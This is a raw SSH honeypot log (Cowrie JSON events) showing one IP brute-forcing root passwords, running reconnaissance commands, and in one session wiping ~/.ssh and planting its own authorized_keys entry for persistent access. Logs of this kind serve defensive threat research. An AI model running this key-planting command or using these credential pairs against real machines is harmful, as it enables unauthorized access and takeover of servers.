nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:01.783261Z","src_ip":"212.227.235.229","session":"c64d43e23951"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:01.785584Z","src_ip":"212.227.235.229","session":"c64d43e23951"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:02.061615Z","src_ip":"212.227.235.229","session":"1caefc8341f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52528,"dst_ip":"1.2.3.4","dst_port":22,"session":"285a9d9aaeef","protocol":"ssh","message":"New connection: 212.227.235.229:52528 (1.2.3.4:22) [session: 285a9d9aaeef]","sensor":"my-vps","timestamp":"2025-09-08T22:21:02.369062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:02.369769Z","src_ip":"212.227.235.229","session":"285a9d9aaeef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:02.678084Z","src_ip":"212.227.235.229","session":"285a9d9aaeef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:03.952295Z","src_ip":"212.227.235.229","session":"285a9d9aaeef"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:04.261014Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:04.262495Z","src_ip":"212.227.235.229","session":"285a9d9aaeef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"30.5","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 30.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:14.666117Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:15.272241Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T22:21:15.272947Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:15.521974Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:16.039677Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T22:21:16.040352Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:16.292085Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:16.886064Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T22:21:16.886803Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:17.137875Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:17.694143Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T22:21:17.694908Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:17.942945Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:18.462197Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T22:21:18.462883Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:18.711957Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:19.316373Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T22:21:19.317132Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:19.567183Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.closed","duration":"60.6","message":"Connection lost after 60.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:19.568366Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60050,"dst_ip":"1.2.3.4","dst_port":22,"session":"04b70dd97d57","protocol":"ssh","message":"New connection: 212.227.235.229:60050 (1.2.3.4:22) [session: 04b70dd97d57]","sensor":"my-vps","timestamp":"2025-09-08T22:21:23.542908Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32816,"dst_ip":"1.2.3.4","dst_port":22,"session":"30eda600a9ba","protocol":"ssh","message":"New connection: 212.227.235.229:32816 (1.2.3.4:22) [session: 30eda600a9ba]","sensor":"my-vps","timestamp":"2025-09-08T22:21:26.578359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:26.579609Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:26.871773Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty12!","message":"login attempt [root/Qwerty12!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:28.084359Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:28.688097Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:21:28.688867Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:21:28.689925Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:28.983965Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:29.685766Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:21:29.686591Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:21:29.980745Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:29.981756Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32822,"dst_ip":"1.2.3.4","dst_port":22,"session":"3934cd3b7fa0","protocol":"ssh","message":"New connection: 212.227.235.229:32822 (1.2.3.4:22) [session: 3934cd3b7fa0]","sensor":"my-vps","timestamp":"2025-09-08T22:21:30.270096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:30.271386Z","src_ip":"212.227.235.229","session":"3934cd3b7fa0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:30.561471Z","src_ip":"212.227.235.229","session":"3934cd3b7fa0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:21:31.758909Z","src_ip":"212.227.235.229","session":"3934cd3b7fa0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:33.050505Z","src_ip":"212.227.235.229","session":"3934cd3b7fa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32838,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ee3a54217e6","protocol":"ssh","message":"New connection: 212.227.235.229:32838 (1.2.3.4:22) [session: 1ee3a54217e6]","sensor":"my-vps","timestamp":"2025-09-08T22:21:33.346448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:33.347260Z","src_ip":"212.227.235.229","session":"1ee3a54217e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:33.642346Z","src_ip":"212.227.235.229","session":"1ee3a54217e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59820,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2555596b18f","protocol":"ssh","message":"New connection: 212.227.235.229:59820 (1.2.3.4:22) [session: e2555596b18f]","sensor":"my-vps","timestamp":"2025-09-08T22:21:34.177488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:34.236572Z","src_ip":"212.227.235.229","session":"e2555596b18f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:34.438460Z","src_ip":"212.227.235.229","session":"e2555596b18f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:34.862933Z","src_ip":"212.227.235.229","session":"1ee3a54217e6"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:35.156689Z","src_ip":"212.227.235.229","session":"30eda600a9ba"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:35.159358Z","src_ip":"212.227.235.229","session":"1ee3a54217e6"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"Welcome1","message":"login attempt [odoo/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:21:35.397201Z","src_ip":"212.227.235.229","session":"e2555596b18f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:36.601904Z","src_ip":"212.227.235.229","session":"e2555596b18f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34142,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d3c5ebda1ec","protocol":"ssh","message":"New connection: 212.227.235.229:34142 (1.2.3.4:22) [session: 4d3c5ebda1ec]","sensor":"my-vps","timestamp":"2025-09-08T22:21:37.629987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:37.630851Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:37.960775Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40458,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eb680adfec3","protocol":"ssh","message":"New connection: 212.227.235.229:40458 (1.2.3.4:22) [session: 8eb680adfec3]","sensor":"my-vps","timestamp":"2025-09-08T22:21:38.628421Z"}
